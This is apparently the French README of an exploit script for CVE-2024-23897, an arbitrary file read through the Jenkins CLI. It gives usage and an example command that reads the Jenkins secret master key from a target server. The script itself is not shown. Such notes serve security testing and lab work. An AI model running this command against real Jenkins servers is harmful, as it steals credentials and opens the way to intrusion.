
Lecture arbitraire via Jenkins CLI (CVE-2024-23897 concerne les versions antérieures à 2.442 et LTS 2.426.3)
Lit les 3 premières lignes de tout fichier avec permission de lecture pour l'utilisateur actuel sur le système. Le script utilise proxychains en interne.
Utilisation :
python CVE-2024-23897.py <chemin jenkins-cli.jar> <URI cible> <chemin du fichier>
Exemple :
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key